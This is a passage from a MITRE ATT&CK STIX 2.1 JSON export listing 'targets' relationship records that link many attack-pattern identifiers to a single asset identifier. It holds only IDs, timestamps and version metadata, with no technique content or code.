"2024-07-01T10:37:15.833978", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60e94f78-1c79-4da9-b094-6f9b6544e78a", "created": "2024-07-01T10:37:15.833986", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833988", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf363fa6-3952-4976-82a1-712c36ef63bc", "created": "2024-07-01T10:37:15.833995", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833997", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3ffdba7-0225-4639-89b8-4c703c4f02ac", "created": "2024-07-01T10:37:15.834005", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834007", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2191a3d0-d162-42f3-92d1-d9e575031b3b", "created": "2024-07-01T10:37:15.834015", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834017", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6af7846c-7e22-47f4-b7e8-eacc2ef10070", "created": "2024-07-01T10:37:15.834025", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834027", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ead8400a-559f-426c-8c7a-dc4e0be8efaf", "created": "2024-07-01T10:37:15.834035", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834037", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--200d96cd-bc7f-475d-9171-887a52b12c67", "created": "2024-07-01T10:37:15.834044", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834046", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--541b2e32-8d5d-4989-8782-a2b0246f6227", "created": "2024-07-01T10:37:15.834057", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834059", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c75dd0c1-03ae-41fb-9bf6-6aec157953c4", "created": "2024-07-01T10:37:15.834067", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834069", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--73253c0c-6430-40c3-a8ac-1d249753f7d1", "created": "2024-07-01T10:37:15.834077", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834079", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d320975-1ed7-4b8f-b9bf-72c1aea4f47c", "created": "2024-07-01T10:37:15.834087", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834089", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a7e9f56f-c791-47d7-b176-6ee02b574f08", "created": "2024-07-01T10:37:15.834097", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834099", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a596a87e-38a9-4d61-ace0-e53cf1ff5d1e", "created": "2024-07-01T10:37:15.834106", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834108", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba1211b4-0d8b-4a83-b38a-39f0a5e5859f", "created": "2024-07-01T10:37:15.834116", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834118", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d9102113-e497-45f5-9fe4-8fa7a5603089", "created": "2024-07-01T10:37:15.834125", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834128", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ae1e20b-7492-41d8-aa6b-241268b08dc8", "created": "2024-07-01T10:37:15.834135", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834137", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1f5fc7e1-2ca2-42c6-a4ba-f5098ab74d6f", "created": "2024-07-01T10:37:15.834145", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834147", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72109024-4e1d-4fcc-9d06-b0bc10aaab1a", "created": "2024-07-01T10:37:15.834155", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834157", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4300680-d821-42c9-8790-e725b8e792e1", "created": "2024-07-01T10:37:15.834204", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834207", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c3592f35-159e-4708-9d74-2ee916667cb4", "created": "2024-07-01T10:37:15.834215", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834217", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a0d09ae6-8a86-48a7-92cd-0829509dccd1", "created": "2024-07-01T10:37:15.834225", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834227", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b3abf4c4-0e99-4a55-9e42-eb16f597e623", "created": "2024-07-01T10:37:15.834235", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834237", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08094983-b0b9-4d00-a688-5299138c09e6", "created": "2024-07-01T10:37:15.834245", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834247", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--82e47c31-84ec-416d-953b-369ae0f651b4", "created": "2024-07-01T10:37:15.834255", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834257", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2a04431a-7160-443f-80d9-1becbf8cf7eb", "created": "2024-07-01T10:37:15.834264", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834266", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ca6c0ab-60bc-4ad0-be33-9504d3605174", "created": "2024-07-01T10:37:15.834274", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834276", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c149b32-7a5e-4393-b352-c1a24c77b6da", "created": "2024-07-01T10:37:15.834284", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834286", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b18852d1-190b-4bdc-abbc-87fe94bc65a9", "created": "2024-07-01T10:37:15.834293", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834295", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b43f49c5-a5e3-4a1d-8843-694f7b542f9c", "created": "2024-07-01T10:37:15.834303", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834305", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b73e5bcc-38df-4398-8740-1cc88b4a9d3d", "created": "2024-07-01T10:37:15.834313", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834315", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b1b4369-30a0-4b4f-9901-a251c877b9cb", "created": "2024-07-01T10:37:15.834322", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834324", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--34a7dd96-0972-4227-be9f-388c3ea8a772", "created": "2024-07-01T10:37:15.834332", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834334", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa3d6a53-9658-4cd3-a649-8fc45ef38014", "created": "2024-07-01T10:37:15.834342", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834344", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3a606709-98d1-4cd2-a24b-dc84ff6d2ccd", "created": "2024-07-01T10:37:15.834351", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834354", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--deca803f-ef54-498c-807f-45e45e67b5e6", "created": "2024-07-01T10:37:15.834361", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834363", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--249e6ca0-fe6c-4260-b14c-77cc94ad6440", "created": "2024-07-01T10:37:15.834371", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834373", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9017d0d0-054e-44a7-9cb0-e4f495db68fa", "created": "2024-07-01T10:37:15.834381", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834383", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3de5fa7a-5ead-4266-aa50-a23aa88e8aa8", "created": "2024-07-01T10:37:15.834391", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834393", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d4bc7e0-8556-4046-a039-c8218999214a", "created": "2024-07-01T10:37:15.834400", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834402", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2cb967f7-a58b-43fd-aeab-0728b9b8caa5", "created": "2024-07-01T10:37:15.834410", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834412", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c45bdf96-843a-470d-ae82-57e2b5fb3e19", "created": "2024-07-01T10:37:15.834420", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834422", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", 